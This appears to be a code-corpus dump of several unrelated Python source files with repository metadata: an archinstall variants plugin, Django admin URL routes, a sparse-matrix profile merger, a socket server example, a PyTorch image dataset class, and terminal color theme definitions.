] | 3 | 2021-06-08T16:01:23.000Z | 2021-11-14T00:49:36.000Z | archinstall-variants.py | phisch/archinstall-variants | f9575c14316aff66c6d3b9b35fca09509afeb51b | [
"MIT"
] | null | null | null | archinstall-variants.py | phisch/archinstall-variants | f9575c14316aff66c6d3b9b35fca09509afeb51b | [
"MIT"
] | null | null | null | import logging
import archinstall
__version__ = 0.1
class Plugin:
    """archinstall plugin that applies a named 'variant' of a configuration.

    The configuration may define a "variants" dictionary mapping a variant
    name to a partial set of arguments.  On plugin load, one variant is
    chosen (from the "variant" argument, interactively, or by default) and
    merged into archinstall.arguments; the plugin-specific keys are then
    removed so the rest of archinstall never sees them.
    """

    VARIANTS_DICT_KEY = "variants"  # config key holding all variants
    VARIANT_KEY = "variant"         # config key naming the chosen variant

    def __init__(self):
        # Only act when a well-formed "variants" dictionary is present.
        if self.has_variants() and self.variants_is_dict():
            variant_key = self.get_selected_variant_key()
            variant = archinstall.arguments[self.VARIANTS_DICT_KEY][variant_key]
            self.apply_variant(variant)
            self.clean_arguments()
            archinstall.log(
                f"The '{ variant_key }' variant was applied to the arguments.",
                level=logging.INFO
            )
            archinstall.log(
                "New arguments: " + archinstall.arguments.__str__(),
                level=logging.DEBUG
            )

    def variants_is_dict(self) -> bool:
        """Return True when the "variants" entry is a dictionary."""
        return isinstance(self.get_variants(), dict)

    def has_variant_argument(self) -> bool:
        """Return True when an explicit variant name (a string) was given."""
        return self.VARIANT_KEY in archinstall.arguments and \
            isinstance(self.get_variant_argument(), str)

    def get_variant_argument(self) -> str:
        """Return the explicitly requested variant name."""
        return archinstall.arguments[self.VARIANT_KEY]

    def variant_argument_in_variants(self) -> bool:
        """Return True when the requested variant actually exists."""
        return self.get_variant_argument() in self.get_variants()

    def get_variants(self) -> dict:
        """Return the raw "variants" entry from the arguments."""
        return archinstall.arguments[self.VARIANTS_DICT_KEY]

    def has_variants(self) -> bool:
        """Return True when the arguments define any variants."""
        return self.VARIANTS_DICT_KEY in archinstall.arguments

    def variant_exists(self, variant: str) -> bool:
        """Return True when `variant` is a defined variant name."""
        return variant in self.get_variants()

    def get_selected_variant_key(self) -> str:
        """Pick the variant to apply.

        Preference order: the explicit "variant" argument (when valid),
        then an interactive choice when several variants exist, then the
        first (and only) variant.
        """
        options = list(self.get_variants().keys())
        if self.has_variant_argument() and self.variant_argument_in_variants():
            return self.get_variant_argument()
        if len(options) > 1:
            return archinstall.generic_select(
                options,
                f"Select which variant you want to install (default: {options[0]}):",
                True
            ) or options[0]
        return options[0]

    def apply_variant(self, variant: dict):
        """Merge the chosen variant into archinstall.arguments.

        List-valued options already present are extended; everything else
        (including options not yet present) is overwritten.
        """
        for option in variant:
            if option in archinstall.arguments:
                if isinstance(archinstall.arguments[option], list):
                    archinstall.arguments[option] += variant[option]
                    continue
            self.overwrite(option, variant[option])

    def clean_arguments(self):
        """Drop the plugin-specific keys from the arguments.

        BUGFIX: the "variant" key is optional (a variant may be selected
        interactively or by default, see get_selected_variant_key), so the
        previous unconditional `del` could raise KeyError when the user
        never supplied one.  pop(..., None) tolerates a missing key.
        """
        archinstall.arguments.pop(self.VARIANTS_DICT_KEY, None)
        archinstall.arguments.pop(self.VARIANT_KEY, None)

    def overwrite(self, key: str, value):
        """Set a single argument to the variant-provided value."""
        archinstall.arguments[key] = value
| 32.620253 | 85 | 0.631354 | 2,520 | 0.977881 | 0 | 0 | 0 | 0 | 0 | 0 | 166 | 0.064416 |
a4fdbb92ca1d67c1847d8902e458cfee14e5b0d4 | 1,316 | py | Python | declaraciones/declaracion/urls/admin.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 2 | 2019-10-17T02:40:12.000Z | 2019-10-17T22:51:36.000Z | declaraciones/declaracion/urls/admin.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 1 | 2019-10-02T20:23:12.000Z | 2019-10-02T20:23:12.000Z | declaraciones/declaracion/urls/admin.py | gob-cdmx/declaraciones | 90347c1572fa5b8137c5e0d23e6a7c6b2a0b2311 | [
"MIT"
] | 4 | 2019-08-20T21:16:04.000Z | 2021-07-01T03:08:10.000Z | from django.urls import path
from declaracion.views import (BusquedaDeclarantesFormView, InfoDeclarantesFormView, InfoDeclaracionFormView,
BusquedaDeclaracionesFormView, BusquedaUsuariosFormView, NuevoUsuariosFormView,
EliminarUsuarioFormView,InfoUsuarioFormView,EditarUsuarioFormView)
# Admin-facing routes for searching and managing declarants, declarations
# and users.  URL names mirror the (Spanish) path segments.
urlpatterns = [
    # Search views.
    path('busqueda-declarantes', BusquedaDeclarantesFormView.as_view(),
         name='busqueda-declarantes'),
    path('busqueda-declaraciones', BusquedaDeclaracionesFormView.as_view(),
         name='busqueda-declaraciones'),
    path('busqueda-usuarios', BusquedaUsuariosFormView.as_view(),
         name='busqueda-usuarios'),
    # Detail views keyed by primary key.
    path('info-declarante/<int:pk>/', InfoDeclarantesFormView.as_view(),
         name='info-declarante'),
    path('info-usuario/<int:pk>/', InfoUsuarioFormView.as_view(),
         name='info-usuario'),
    # User management: delete / edit / create.
    path('eliminar-usuario/<int:pk>/', EliminarUsuarioFormView.as_view(),
         name='eliminar-usuario'),
    path('editar-usuario/<int:pk>/', EditarUsuarioFormView.as_view(),
         name='editar-usuario'),
    path('nuevo-usuario', NuevoUsuariosFormView.as_view(),
         name='nuevo-usuario'),
    path('info-declaracion/<int:pk>/', InfoDeclaracionFormView.as_view(),
         name='info-declaracion'),
]
| 45.37931 | 110 | 0.693769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 376 | 0.285714 |
a4fdc2ff6fb2daea0ed4afc31809a891b4b75ce0 | 1,501 | py | Python | rpbp/translation_prediction/merge_replicate_orf_profiles.py | HeyLifeHD/rp-bp | 9c59b1bc0267400747477467c45f96364d5528e1 | [
"MIT"
] | 6 | 2016-05-16T18:52:41.000Z | 2021-12-31T06:27:29.000Z | rpbp/translation_prediction/merge_replicate_orf_profiles.py | HeyLifeHD/rp-bp | 9c59b1bc0267400747477467c45f96364d5528e1 | [
"MIT"
] | 110 | 2016-06-22T13:24:39.000Z | 2022-02-07T09:29:14.000Z | rpbp/translation_prediction/merge_replicate_orf_profiles.py | HeyLifeHD/rp-bp | 9c59b1bc0267400747477467c45f96364d5528e1 | [
"MIT"
] | 5 | 2017-05-22T12:21:51.000Z | 2022-02-06T10:32:56.000Z | #! /usr/bin/env python3
import argparse
import logging
import scipy.io
import pbio.misc.logging_utils as logging_utils
import pbio.misc.math_utils as math_utils
logger = logging.getLogger(__name__)
def main():
    """Sum a set of sparse (mtx) ORF profiles into one merged matrix."""
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        description="""This script adds the ORF profiles from a set
of profiles (presumably, each file corresponds to one replicate from a condition).
The script keeps the profiles in sparse matrix format, so it is fairly efficient.""")

    parser.add_argument('profiles', help="The (mtx) files containing the ORF profiles", nargs='+')
    parser.add_argument('out', help="The (mtx.gz) output file containing the merged profiles")

    logging_utils.add_logging_options(parser)
    args = parser.parse_args()
    logging_utils.update_logging(args)

    logger.info("Reading first ORF profile")
    # Seed the accumulator with the first profile; CSR format keeps the
    # element-wise additions below sparse and efficient.
    merged_profiles = scipy.io.mmread(args.profiles[0]).tocsr()

    logger.info("Adding each additional profile")
    for additional_profile in args.profiles[1:]:
        logger.info("Reading file: {}".format(additional_profile))
        merged_profiles = merged_profiles + scipy.io.mmread(additional_profile).tocsr()

    logger.info("Writing merged profiles to disk")
    math_utils.write_sparse_matrix(args.out, merged_profiles)


if __name__ == '__main__':
    main()
| 30.02 | 98 | 0.702199 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 495 | 0.32978 |
a4fdfb3a84f9a4748985f013f6aacec4b99c4f66 | 959 | py | Python | examples/basicServer.py | lwahlmeier/python-litesockets | 2d057e171ac56271c2a7c4e42425b6c6d7ed7011 | [
"Unlicense"
] | 1 | 2015-03-05T04:42:30.000Z | 2015-03-05T04:42:30.000Z | examples/basicServer.py | lwahlmeier/python-litesockets | 2d057e171ac56271c2a7c4e42425b6c6d7ed7011 | [
"Unlicense"
] | 1 | 2017-06-06T15:36:21.000Z | 2019-05-29T15:07:18.000Z | examples/basicServer.py | lwahlmeier/python-litesockets | 2d057e171ac56271c2a7c4e42425b6c6d7ed7011 | [
"Unlicense"
] | null | null | null | from litesockets import SocketExecuter, TcpServer
import time

# NOTE(review): this example uses the Python 2 print statement.
# Start a SocketExecuter (defaults to 5 worker threads).
SE = SocketExecuter()
# Create a TCP server for localhost:11882 (the listen socket is not open yet).
server = TcpServer("localhost", 11882)


# Called once for each client that connects.
def newConnection(client):
    print "Got new TCPClient", client
    # The client must be added to the SocketExecuter before it can be used.
    SE.addClient(client)
    client.addWrite("hello\n")
    # To consume incoming data we would attach a reader to the client here.
    time.sleep(.01)
    # Close the client's connection.
    client.end()


# Register the one-argument callback that receives each new client.
server.onNew = newConnection
# Open the listen socket; connections are not accepted yet.
server.connect()
# Adding the server to the SocketExecuter starts accepting connections.
SE.addServer(server)
# Keep the main thread alive so the server keeps running.
time.sleep(100000)
| 29.96875 | 83 | 0.754953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 598 | 0.623566 |
a4feafde3d05274cb509f43c2de00534da560e12 | 6,679 | py | Python | datasets.py | jackwang0108/AlexNet | 53ff64823c461c752499108f2845d83e877a3c07 | [
"MIT"
] | 1 | 2022-03-22T09:34:25.000Z | 2022-03-22T09:34:25.000Z | datasets.py | jackwang0108/AlexNet | 53ff64823c461c752499108f2845d83e877a3c07 | [
"MIT"
] | null | null | null | datasets.py | jackwang0108/AlexNet | 53ff64823c461c752499108f2845d83e877a3c07 | [
"MIT"
] | null | null | null |
# Standard Library
import pickle
from typing import *
from pathlib import Path
# Third-party Party
import numpy as np
import PIL.Image as Image
from colorama import Fore, init
# Torch Library
import torch
import torch.utils.data as data
import torchvision.transforms as T
# My Library
from helper import visualize_np, visualize_plt, visualize_pil
from helper import ProjectPath, DatasetPath
from helper import ClassLabelLookuper
init(autoreset=True)
# Type variable for anything this module treats as an "image": a decoded
# array/tensor, or a path to an image file (PascalVOC2012 stores paths).
ImageType = TypeVar(
    "ImageType",
    np.ndarray, torch.Tensor, Path
)
# Type variable for label containers.
# NOTE(review): ClassType is not referenced anywhere in this chunk -- it may
# be part of the module's public API; confirm before removing.
ClassType = TypeVar(
    "ClassType",
    np.ndarray, torch.Tensor
)
class MultiDataset(data.Dataset):
    """Unified map-style dataset over Cifar10, Cifar100 and PascalVOC2012.

    Cifar images/labels are loaded eagerly into memory as ndarrays;
    PascalVOC2012 keeps a list of image paths that are opened lazily.
    A torchvision transform must be registered via ``set_transform``
    before the dataset is iterated.
    """

    def __init__(self, dataset: str, split: str):
        """
        Args:
            dataset: one of "Cifar10", "Cifar100" or "PascalVOC2012".
            split: one of "train", "val" or "test".
        """
        super(MultiDataset, self).__init__()
        assert split in (s := ["train", "val", "test"]), f"{Fore.RED}Invalid split, should be in {s}"
        self.split = split
        self.dataset = dataset
        # Dispatch table: dataset name -> reader returning (image, label).
        self._dataset_reader: Dict[str, Callable] = {
            "Cifar10": self.__read_cifar10,
            "Cifar100": self.__read_cifar100,
            "PascalVOC2012": self.__read_PascalVOC2012
        }
        assert dataset in self._dataset_reader.keys(), f"{Fore.RED}Invalid dataset, please select in " \
                                                       f"{self._dataset_reader.keys()}."
        # Cifar: ndarray of images in memory; PascalVOC2012: list of Paths.
        self.image: Union[np.ndarray, List[Path]]
        self.label: np.ndarray
        self.image, self.label = self._dataset_reader[self.dataset]()
        self.select_train_val()
        self.num_class = len(ClassLabelLookuper(self.dataset).cls)

    def __len__(self) -> int:
        return len(self.image)

    def __getitem__(self, idx) -> Tuple[torch.Tensor, torch.Tensor]:
        """Return ``(transformed image, label)`` for the given index."""
        image, label = self.image[idx], self.label[idx]
        if isinstance(image, Path):
            image = Image.open(image)
        else:
            image = Image.fromarray(image.astype(np.uint8)).convert("RGB")
        # NOTE: set_transform must have been called first; there is no default.
        return self.transform(image), label

    def set_transform(self, transform: T.Compose) -> "MultiDataset":
        """Register the transform applied in ``__getitem__``; returns self for chaining."""
        self.transform = transform
        return self

    def select_train_val(self, trainval_ratio: Optional[float] = 0.2) -> None:
        """Split the official Cifar training set into train/val subsets.

        For each class, ``trainval_ratio`` of the images are reserved for
        validation.  The per-class index split is generated once, cached as
        an ``.npz`` under ``ProjectPath.config`` and reused on later runs
        (regenerated when the cached ratio differs).  No-op for the test
        split and for PascalVOC2012, which ships its own val index.
        """
        # Group image indices by label.
        self.label_image: Dict[int, np.ndarray] = {}
        for label in np.unique(self.label):
            self.label_image[label] = np.where(self.label == label)[0]
        if self.dataset in ["Cifar10", "Cifar100"]:
            if self.split == "test":
                return
            else:
                # Load the cached split if present, else (re)generate it below.
                if (config_path := ProjectPath.config.joinpath(f"{self.dataset}.npz")).exists():
                    data = np.load(config_path)
                    ratio, train, val = data["ratio"], data["train"], data["val"]
                if not config_path.exists() or ratio != trainval_ratio:
                    train, val = [], []
                    for label, image_idx in self.label_image.items():
                        np.random.shuffle(image_idx)
                        val_num = int(trainval_ratio * len(image_idx))
                        val.append(image_idx[:val_num])
                        train.append(image_idx[val_num:])
                    # Per-class index arrays have equal length for Cifar,
                    # so they can be stacked for compact storage.
                    train = np.stack(train, axis=0)
                    val = np.stack(val, axis=0)
                    config_path.parent.mkdir(parents=True, exist_ok=True)
                    np.savez(config_path, ratio=trainval_ratio, train=train, val=val)
                train = np.concatenate(train, axis=0)
                val = np.concatenate(val, axis=0)
                # Keep only the indices of the requested split.
                if self.split == "val":
                    self.image = self.image[val]
                    self.label = self.label[val]
                else:
                    self.image = self.image[train]
                    self.label = self.label[train]
        else:
            return

    def __read_cifar10(self) -> Tuple[np.ndarray, np.ndarray]:
        """Load Cifar10 as (N, 32, 32, 3) images and an int label array."""
        if self.split in ["train", "val"]:
            data = []
            for batch in DatasetPath.Cifar10.train:
                with batch.open(mode="rb") as f:
                    data.append(pickle.load(f, encoding="bytes"))
            image = np.concatenate([i[b"data"].reshape(-1, 3, 32, 32) for i in data], axis=0)
            label = np.concatenate([i[b"labels"] for i in data], axis=0)
        else:
            with DatasetPath.Cifar10.test.open(mode="rb") as f:
                data = pickle.load(f, encoding="bytes")
            image = data[b"data"].reshape(-1, 3, 32, 32)
            label = data[b"labels"]
        # CHW -> HWC so PIL can consume the arrays in __getitem__.
        return image.transpose(0, 2, 3, 1), np.array(label)

    def __read_cifar100(self) -> Tuple[np.ndarray, np.ndarray]:
        """Load Cifar100 (fine labels) as (N, 32, 32, 3) images and labels."""
        if self.split in ["train", "val"]:
            with DatasetPath.Cifar100.train.open(mode="rb") as f:
                data = pickle.load(f, encoding="bytes")
            image = data[b"data"].reshape(-1, 3, 32, 32)
            label = data[b"fine_labels"]
        else:
            with DatasetPath.Cifar100.test.open(mode="rb") as f:
                data = pickle.load(f, encoding="bytes")
            # BUGFIX: pickle.load(..., encoding="bytes") yields *bytes* keys,
            # and Cifar100 batches store labels under b"fine_labels"; the
            # previous str keys "data"/"label" raised KeyError on this branch.
            image = data[b"data"].reshape(-1, 3, 32, 32)
            label = data[b"fine_labels"]
        return image.transpose(0, 2, 3, 1), np.asarray(label)

    def __read_PascalVOC2012(self) -> Tuple[List[Path], np.ndarray]:
        """Collect PascalVOC2012 image paths and labels for train/val."""
        image = []
        label = []
        ccn = ClassLabelLookuper(datasets="PascalVOC2012")
        # BUGFIX: compare for equality instead of the fragile substring test
        # `self.split in "train"` used previously.
        if self.split == "train":
            for k, v in DatasetPath.PascalVOC2012.train_idx.items():
                image.extend(v)
                label.extend([ccn.get_label(k)] * len(v))
        elif self.split == "val":
            for k, v in DatasetPath.PascalVOC2012.val_idx.items():
                image.extend(v)
                label.extend([ccn.get_label(k)] * len(v))
        else:
            assert False, f"{Fore.RED}PascalVOC2012 test data is not accesibly"
        # Attention: PascalVOC2012 contains duplicated images, so deduplicate
        # the paths, keeping the first label seen for each unique path.
        image, idx = np.unique(image, return_index=True)
        return image, np.array(label)[idx]
if __name__ == "__main__":
# md = MultiDataset(dataset="PascalVOC2012", split="val")
# tt = T.Compose([
# T.RandomHorizontalFlip(),
# T.Resize((224, 224)),
# T.ToTensor()
# ])
# md.set_transform(tt)
md = MultiDataset(dataset="Cifar100", split="train")
tt = T.Compose([
T.RandomHorizontalFlip(),
T.ToTensor()
])
md.set_transform(tt)
ccn = ClassLabelLookuper(datasets=md.dataset)
dl = data.DataLoader(md, batch_size=64)
for x, y in dl:
print(x.shape)
visualize_plt(x, [ccn.get_class(i.item()) for i in y])
break
| 37.734463 | 104 | 0.568947 | 5,471 | 0.816933 | 0 | 0 | 0 | 0 | 0 | 0 | 911 | 0.136031 |
3502a92d21f53788d990c4901fe08c12c3d15616 | 11,221 | py | Python | spyder_terminal/widgets/style/themes.py | mrclary/spyder-terminal | 45b2a3ca1ebe7aad5fe2d18536199dfb57d43264 | [
"MIT"
] | 169 | 2017-03-12T00:42:45.000Z | 2022-03-16T20:03:55.000Z | spyder_terminal/widgets/style/themes.py | mrclary/spyder-terminal | 45b2a3ca1ebe7aad5fe2d18536199dfb57d43264 | [
"MIT"
] | 200 | 2017-01-12T23:51:27.000Z | 2022-03-29T15:20:12.000Z | spyder_terminal/widgets/style/themes.py | mrclary/spyder-terminal | 45b2a3ca1ebe7aad5fe2d18536199dfb57d43264 | [
"MIT"
] | 70 | 2017-01-13T00:08:59.000Z | 2022-03-31T19:05:47.000Z | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see LICENSE.txt for details)
# -----------------------------------------------------------------------------
# ANSI palette for each Spyder highlighting theme: theme name -> mapping of
# the 8 normal and 8 bright ANSI color slots to hex strings.  The slot names
# ('black' ... 'brightWhite') match the xterm.js ITheme fields -- presumably
# consumed by the terminal's web frontend; confirm against the JS side.
# NOTE(review): light themes (e.g. 'idle', 'pydev') put light colors in the
# 'black' slot -- presumably so ANSI-black text stays visible on their light
# backgrounds; confirm this is intentional before "fixing" it.
ANSI_COLORS = {
    'emacs': {
        'black': '#000000',
        'red': '#800000',
        'green': '#005100',
        'yellow': '#abab67',
        'blue': '#151d51',
        'magenta': '#510051',
        'cyan': '#105151',
        'white': '#ffffff',
        'brightBlack': '#555555',
        'brightRed': '#c80000',
        'brightGreen': '#00aa00',
        'brightYellow': '#cbcb7b',
        'brightBlue': '#3c51e8',
        'brightMagenta': '#900090',
        'brightCyan': '#20a7a7',
        'brightWhite': '#ffffff'
    },
    'idle': {
        'black': '#ffffff',
        'red': '#8a0000',
        'green': '#008a00',
        'yellow': '#8a4000',
        'blue': '#00008a',
        'magenta': '#5a005a',
        'cyan': '#105151',
        'white': '#ffffff',
        'brightBlack': '#555555',
        'brightRed': '#dd0000',
        'brightGreen': '#00aa00',
        'brightYellow': '#ff7700',
        'brightBlue': '#0000ff',
        'brightMagenta': '#900090',
        'brightCyan': '#20a7a7',
        'brightWhite': '#ffffff'
    },
    'monokai': {
        'black': '#48483e',
        'red': '#dc2566',
        'green': '#8fc029',
        'yellow': '#d4c96e',
        'blue': '#55bcce',
        'magenta': '#9358fe',
        'cyan': '#56b7a5',
        'white': '#f8f8f2',
        'brightBlack': '#76715e',
        'brightRed': '#fa2772',
        'brightGreen': '#a7e22e',
        'brightYellow': '#e7db75',
        'brightBlue': '#66d9ee',
        'brightMagenta': '#ae82ff',
        'brightCyan': '#66efd5',
        'brightWhite': '#f9f8f5'
    },
    'pydev': {
        'black': '#ffffff',
        'red': '#800000',
        'green': '#00aa00',
        'yellow': '#ffff99',
        'blue': '#0000ff',
        'magenta': '#900090',
        'cyan': '#007f7f',
        'white': '#efefef',
        'brightBlack': '#c0c0c0',
        'brightRed': '#c10000',
        'brightGreen': '#00cc00',
        'brightYellow': '#fff569',
        'brightBlue': '#015aff',
        'brightMagenta': '#bf00bf',
        'brightCyan': '#00a5a5',
        'brightWhite': '#ffffff'
    },
    'scintilla': {
        'black': '#ffffff',
        'red': '#800000',
        'green': '#007f00',
        'yellow': '#ffff99',
        'blue': '#00007f',
        'magenta': '#7f007f',
        'cyan': '#007f7f',
        'white': '#efefef',
        'brightBlack': '#adadad',
        'brightRed': '#c10000',
        'brightGreen': '#00ab00',
        'brightYellow': '#fff569',
        'brightBlue': '#0000ff',
        'brightMagenta': '#be00be',
        'brightCyan': '#00a5a5',
        'brightWhite': '#ffffff'
    },
    'spyder': {
        'black': '#ffffff',
        'red': '#800000',
        'green': '#00aa00',
        'yellow': '#ffff99',
        'blue': '#0000ff',
        'magenta': '#900090',
        'cyan': '#27b5ac',
        'white': '#efefef',
        'brightBlack': '#adadad',
        'brightRed': '#c10000',
        'brightGreen': '#00c800',
        'brightYellow': '#fff569',
        'brightBlue': '#0a37ff',
        'brightMagenta': '#d500d5',
        'brightCyan': '#2dd0c5',
        'brightWhite': '#ffffff'
    },
    'spyder/dark': {
        'black': '#19232D',
        'red': '#c80000',
        'green': '#11a642',
        'yellow': '#c5bb29',
        'blue': '#558eff',
        'magenta': '#aa00aa',
        'cyan': '#20b3a7',
        'white': '#ffffff',
        'brightBlack': '#4b4b4b',
        'brightRed': '#ef0000',
        'brightGreen': '#13c24b',
        'brightYellow': '#e6e13f',
        'brightBlue': '#4395ff',
        'brightMagenta': '#da00da',
        'brightCyan': '#23cbbd',
        'brightWhite': '#ffffff'
    },
    'zenburn': {
        'black': '#3F3F3F',
        'red': '#705050',
        'green': '#60B48A',
        'yellow': '#DFAF8F',
        'blue': '#506070',
        'magenta': '#DC8CC3',
        'cyan': '#8CD0D3',
        'white': '#DCDCCC',
        'brightBlack': '#709080',
        'brightRed': '#DCA3A3',
        'brightGreen': '#C3BF9F',
        'brightYellow': '#F0DFAF',
        'brightBlue': '#94BFF3',
        'brightMagenta': '#EC93D3',
        'brightCyan': '#93E0E3',
        'brightWhite': '#DCDCCC'
    },
    'solarized/light': {
        'black': '#fdf6e3',
        'red': '#dc322f',
        'green': '#859900',
        'yellow': '#b58900',
        'blue': '#268bd2',
        'magenta': '#6c71c4',
        'cyan': '#2aa198',
        'white': '#93a1a1',
        'brightBlack': '#657b83',
        'brightRed': '#dc322f',
        'brightGreen': '#859900',
        'brightYellow': '#b58900',
        'brightBlue': '#268bd2',
        'brightMagenta': '#6c71c4',
        'brightCyan': '#2aa198',
        'brightWhite': '#fdf6e3'
    },
    'solarized/dark': {
        'black': '#002b36',
        'red': '#dc322f',
        'green': '#859900',
        'yellow': '#b58900',
        'blue': '#268bd2',
        'magenta': '#6c71c4',
        'cyan': '#2aa198',
        'white': '#93a1a1',
        'brightBlack': '#657b83',
        'brightRed': '#dc322f',
        'brightGreen': '#859900',
        'brightYellow': '#b58900',
        'brightBlue': '#268bd2',
        'brightMagenta': '#6c71c4',
        'brightCyan': '#2aa198',
        'brightWhite': '#fdf6e3'
    },
    'inkpot': {
        'black': '#1f1f27',
        'red': '#CD5200',
        'green': '#9DCD00',
        'yellow': '#cd8b00',
        'blue': '#87cefa',
        'magenta': '#8b8bff',
        'cyan': '#87FAE5',
        'white': '#93a1a1',
        'brightBlack': '#313131',
        'brightRed': '#CD2300',
        'brightGreen': '#C0CD00',
        'brightYellow': '#ffcd8b',
        'brightBlue': '#B9E1FA',
        'brightMagenta': '#A3A3FF',
        'brightCyan': '#B8FAEE',
        'brightWhite': '#cfbfad'
    },
    'minimal': {
        'black': '#ffffff',
        'red': '#D22D72',
        'green': '#568C3B',
        'yellow': '#8A8A0F',
        'blue': '#257FAD',
        'magenta': '#5D5DB1',
        'cyan': '#2D8F6F',
        'white': '#7EA2B4',
        'brightBlack': '#5A7B8C',
        'brightRed': '#D22D72',
        'brightGreen': '#568C3B',
        'brightYellow': '#8A8A0F',
        'brightBlue': '#257FAD',
        'brightMagenta': '#5D5DB1',
        'brightCyan': '#2D8F6F',
        'brightWhite': '#EBF8FF'
    },
    'nightlion': {
        'black': '#4c4c4c',
        'red': '#bb0000',
        'green': '#5fde8f',
        'yellow': '#f3f167',
        'blue': '#276bd8',
        'magenta': '#bb00bb',
        'cyan': '#00dadf',
        'white': '#bbbbbb',
        'brightBlack': '#555555',
        'brightRed': '#ff5555',
        'brightGreen': '#55ff55',
        'brightYellow': '#ffff55',
        'brightBlue': '#5555ff',
        'brightMagenta': '#ff55ff',
        'brightCyan': '#55ffff',
        'brightWhite': '#ffffff'
    },
    'notepad++': {
        'black': '#ffffff',
        'red': '#CC342B',
        'green': '#198844',
        'yellow': '#FBA922',
        'blue': '#3971ED',
        'magenta': '#A36AC7',
        'cyan': '#3971ED',
        'white': '#C5C8C6',
        'brightBlack': '#969896',
        'brightRed': '#CC342B',
        'brightGreen': '#198844',
        'brightYellow': '#FBA922',
        'brightBlue': '#3971ED',
        'brightMagenta': '#A36AC7',
        'brightCyan': '#3971ED',
        'brightWhite': '#FFFFFF'
    },
    'oblivion': {
        'black': '#1D1F21',
        'red': '#CC6666',
        'green': '#B5BD68',
        'yellow': '#F0C674',
        'blue': '#81A2BE',
        'magenta': '#B294BB',
        'cyan': '#8ABEB7',
        'white': '#C5C8C6',
        'brightBlack': '#969896',
        'brightRed': '#CC6666',
        'brightGreen': '#B5BD68',
        'brightYellow': '#F0C674',
        'brightBlue': '#81A2BE',
        'brightMagenta': '#B294BB',
        'brightCyan': '#8ABEB7',
        'brightWhite': '#FFFFFF'
    },
    'obsidian': {
        'black': '#232C31',
        'red': '#2A5491',
        'green': '#237986',
        'yellow': '#A03B1E',
        'blue': '#484D79',
        'magenta': '#C59820',
        'cyan': '#B02F30',
        'white': '#9EA7A6',
        'brightBlack': '#3F4944',
        'brightRed': '#2A5491',
        'brightGreen': '#237986',
        'brightYellow': '#A03B1E',
        'brightBlue': '#484D79',
        'brightMagenta': '#C59820',
        'brightCyan': '#B02F30',
        'brightWhite': '#B5D8F6'
    },
    'pastel': {
        'black': '#000000',
        'red': '#c37372',
        'green': '#72c373',
        'yellow': '#c2c372',
        'blue': '#7372c3',
        'magenta': '#c372c2',
        'cyan': '#72c2c3',
        'white': '#d9d9d9',
        'brightBlack': '#323232',
        'brightRed': '#dbaaaa',
        'brightGreen': '#aadbaa',
        'brightYellow': '#dadbaa',
        'brightBlue': '#aaaadb',
        'brightMagenta': '#dbaada',
        'brightCyan': '#aadadb',
        'brightWhite': '#ffffff'
    },
    'retta': {
        'black': '#000000',
        'red': '#A54242',
        'green': '#8C9440',
        'yellow': '#de935f',
        'blue': '#5F819D',
        'magenta': '#85678F',
        'cyan': '#5E8D87',
        'white': '#969896',
        'brightBlack': '#373b41',
        'brightRed': '#cc6666',
        'brightGreen': '#b5bd68',
        'brightYellow': '#f0c674',
        'brightBlue': '#81a2be',
        'brightMagenta': '#b294bb',
        'brightCyan': '#8abeb7',
        'brightWhite': '#c5c8c6'
    },
    'roboticket': {
        'black': '#f5f5f5',
        'red': '#E64569',
        'green': '#89D287',
        'yellow': '#DAB752',
        'blue': '#439ECF',
        'magenta': '#D961DC',
        'cyan': '#64AAAF',
        'white': '#B3B3B3',
        'brightBlack': '#535353',
        'brightRed': '#E4859A',
        'brightGreen': '#A2CCA1',
        'brightYellow': '#E1E387',
        'brightBlue': '#6FBBE2',
        'brightMagenta': '#E586E7',
        'brightCyan': '#96DCDA',
        'brightWhite': '#DEDEDE'
    },
    'sublime-monokai/extended': {
        'black': '#222222',
        'red': '#dc2566',
        'green': '#8fc029',
        'yellow': '#d4c96e',
        'blue': '#55bcce',
        'magenta': '#9358fe',
        'cyan': '#56b7a5',
        'white': '#f8f8f2',
        'brightBlack': '#76715e',
        'brightRed': '#fa2772',
        'brightGreen': '#a7e22e',
        'brightYellow': '#e7db75',
        'brightBlue': '#66d9ee',
        'brightMagenta': '#ae82ff',
        'brightCyan': '#66efd5',
        'brightWhite': '#f9f8f5'
    },
    'vibrant-ink': {
        'black': '#191919',
        'red': '#d00e18',
        'green': '#138034',
        'yellow': '#ffcb3e',
        'blue': '#006bb3',
        'magenta': '#6b2775',
        'cyan': '#384564',
        'white': '#ededed',
        'brightBlack': '#5d504a',
        'brightRed': '#f07e18',
        'brightGreen': '#b1d130',
        'brightYellow': '#fff120',
        'brightBlue': '#4fc2fd',
        'brightMagenta': '#de0071',
        'brightCyan': '#5d504a',
        'brightWhite': '#ffffff'
    }
}
| 28.920103 | 79 | 0.441583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,871 | 0.612334 |
350316f5b33bd2c36507f8f4409c13409120a8a7 | 20,209 | py | Python | research/cv/U-GAT-IT/src/models/UGATIT.py | mindspore-ai/models | 9127b128e2961fd698977e918861dadfad00a44c | [
"Apache-2.0"
] | 77 | 2021-10-15T08:32:37.000Z | 2022-03-30T13:09:11.000Z | research/cv/U-GAT-IT/src/models/UGATIT.py | mindspore-ai/models | 9127b128e2961fd698977e918861dadfad00a44c | [
"Apache-2.0"
] | 3 | 2021-10-30T14:44:57.000Z | 2022-02-14T06:57:57.000Z | research/cv/U-GAT-IT/src/models/UGATIT.py | mindspore-ai/models | 9127b128e2961fd698977e918861dadfad00a44c | [
"Apache-2.0"
] | 24 | 2021-10-15T08:32:45.000Z | 2022-03-24T18:45:20.000Z | # Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
